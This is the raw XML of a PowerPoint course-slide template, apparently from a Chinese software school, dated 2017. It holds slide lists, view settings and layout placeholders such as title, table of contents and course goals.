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theme/theme4.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0" r:id="rId2"/>
    <p:sldMasterId id="2147483662" r:id="rId3"/>
    <p:sldMasterId id="2147483674" r:id="rId4"/>
    <p:sldMasterId id="2147483676" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId49"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId50"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="539" r:id="rId7"/>
    <p:sldId id="571" r:id="rId8"/>
    <p:sldId id="540" r:id="rId9"/>
    <p:sldId id="541" r:id="rId10"/>
    <p:sldId id="583" r:id="rId11"/>
    <p:sldId id="584" r:id="rId12"/>
    <p:sldId id="549" r:id="rId13"/>
    <p:sldId id="545" r:id="rId14"/>
    <p:sldId id="558" r:id="rId15"/>
    <p:sldId id="559" r:id="rId16"/>
    <p:sldId id="560" r:id="rId17"/>
    <p:sldId id="561" r:id="rId18"/>
    <p:sldId id="572" r:id="rId19"/>
    <p:sldId id="573" r:id="rId20"/>
    <p:sldId id="562" r:id="rId21"/>
    <p:sldId id="563" r:id="rId22"/>
    <p:sldId id="564" r:id="rId23"/>
    <p:sldId id="565" r:id="rId24"/>
    <p:sldId id="566" r:id="rId25"/>
    <p:sldId id="582" r:id="rId26"/>
    <p:sldId id="581" r:id="rId27"/>
    <p:sldId id="578" r:id="rId28"/>
    <p:sldId id="579" r:id="rId29"/>
    <p:sldId id="585" r:id="rId30"/>
    <p:sldId id="580" r:id="rId31"/>
    <p:sldId id="586" r:id="rId32"/>
    <p:sldId id="575" r:id="rId33"/>
    <p:sldId id="570" r:id="rId34"/>
    <p:sldId id="576" r:id="rId35"/>
    <p:sldId id="546" r:id="rId36"/>
    <p:sldId id="547" r:id="rId37"/>
    <p:sldId id="548" r:id="rId38"/>
    <p:sldId id="553" r:id="rId39"/>
    <p:sldId id="554" r:id="rId40"/>
    <p:sldId id="555" r:id="rId41"/>
    <p:sldId id="556" r:id="rId42"/>
    <p:sldId id="557" r:id="rId43"/>
    <p:sldId id="577" r:id="rId44"/>
    <p:sldId id="587" r:id="rId45"/>
    <p:sldId id="574" r:id="rId46"/>
    <p:sldId id="569" r:id="rId47"/>
    <p:sldId id="311"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201">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
      </p15:sldGuideLst>
    </p:ext>
    <p:ext uri="{2D200454-40CA-4A62-9FC3-DE9A4176ACB9}">
      <p15:notesGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="219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nySong" initials="Tony" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="363787211@qq.com" initials="3"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7AAE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238" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="82" d="100"/>
          <a:sy n="82" d="100"/>
        </p:scale>
        <p:origin x="96" y="150"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="520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336" y="-90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide pos="219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viewProps" Target="viewProps.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.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commentAuthors" Target="commentAuthor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71C804-97F5-4B36-A7AC-EEEC7F44F6C2}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/03/23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51DDEB-361E-476E-B813-80C618F51576}"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8D9C6-D8DC-4CC3-8480-E0C4DBA1CC07}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/03/23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E9C519-C3B1-4654-8EF9-A227F461FE5A}"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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>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Arial Narrow"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Narrow"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Narrow"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Narrow"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Narrow"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Narrow"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Narrow"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Narrow"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Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{63401629-F63E-45F0-933D-27F37F2416B1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:latin typeface="Calibri"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皮">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2459301"/>
            <a:ext cx="12204192" cy="209092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DB9D664F-4C68-42D2-B189-678958EFAFDA}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="图片占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12192" y="1436914"/>
            <a:ext cx="12192000" cy="3317649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="内容占位符 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2634092" y="3504765"/>
            <a:ext cx="7175500" cy="989711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="60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主标题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="内容占位符 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2599871" y="2459301"/>
            <a:ext cx="7175500" cy="731329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>副标题</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0"/>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0"/>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0"/>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0"/>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0"/>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0"/>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0"/>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文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"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a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8D73EBB0-3E92-4CF1-B409-20C6A5789506}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2017/03/23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53B2CC7-3DCD-4B96-9767-B1EAA6C3BED4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3602037"/>
            <a:ext cx="9144000" cy="16557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hasCustomPrompt="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hasCustomPrompt="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hasCustomPrompt="1"/>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3/23/2017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hasCustomPrompt="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hasCustomPrompt="1"/>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3/23/2017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0"/>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0"/>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0"/>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0"/>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0"/>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0"/>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0"/>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3/23/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>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2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>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hasCustomPrompt="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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2057401"/>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3/23/2017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vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2057401"/>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3/23/2017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hasCustomPrompt="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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3602037"/>
            <a:ext cx="9144000" cy="16557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hasCustomPrompt="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hasCustomPrompt="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hasCustomPrompt="1"/>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3/23/2017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hasCustomPrompt="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hasCustomPrompt="1"/>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3/23/2017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2017/03/23</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0"/>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0"/>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0"/>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0"/>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0"/>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0"/>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0"/>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3/23/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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hasCustomPrompt="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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2057401"/>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3/23/2017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vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2057401"/>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3/23/2017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hasCustomPrompt="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F452D9C-F9EB-4417-9C3A-C876C2AF9415}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="543636"/>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目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>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SmartArt 占位符 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832513" y="1801504"/>
            <a:ext cx="10305387" cy="4510396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>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2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="SmartArt 占位符 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="2019300"/>
            <a:ext cx="10083800" cy="4292600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917622" y="516340"/>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课程目标</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2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917622" y="516340"/>
            <a:ext cx="10695258"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课程内容</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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653143" y="1856096"/>
            <a:ext cx="11247120" cy="4500254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="2400">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>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ltLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </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054100" y="6487880"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C5BA751-A251-47D6-8494-C134D9EBED5F}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1417472"/>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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="1856096"/>
            <a:ext cx="10071100" cy="4500254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="24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内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="-1"/>
            <a:ext cx="2882900" cy="1057275"/>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11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1765300" y="203200"/>
            <a:ext cx="1485900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200">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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="内容占位符 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054100" y="556260"/>
            <a:ext cx="2882900" cy="501014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" b="1">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章名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="SmartArt 占位符 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4241800" y="555625"/>
            <a:ext cx="3660254" cy="501649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>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课程总结页">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6E2078-F302-4651-A2A2-2FC6C4E1A3F1}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="Picture 1" descr="C:\Users\Christal-yhy\AppData\Roaming\Tencent\Users\601238172\QQ\WinTemp\RichOle\D2$RZ2O6HM6TXVWC2NT~9[Q.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915701" y="1"/>
            <a:ext cx="4087631" cy="25155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EB581D97-AB7E-4FCB-A143-DD346535FC6B}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>
            <a:ext cx="3860800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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xfrm>
            <a:off x="8737600" y="6356351"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7806F860-75D1-45F9-8F65-FAACBBD0B38A}"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2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5.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1054100" y="6501490"/>
            <a:ext cx="2743200" cy="356510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A1BE0A72-8501-4974-A7B7-5BD248ABBAFC}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/03/23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="软院logo横版.png"/>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2017/03/23</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3512798D-3C63-415D-8EC1-6BE98374BAF6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="软院logo横版.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1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="5865" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="304800" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1335"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3735" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="914400" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1524000" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2665" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="2133600" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2743200" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="3352800" indent="-304800" algn="l" defTabSz="1218565" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="665"/>
        </a:spcBef>
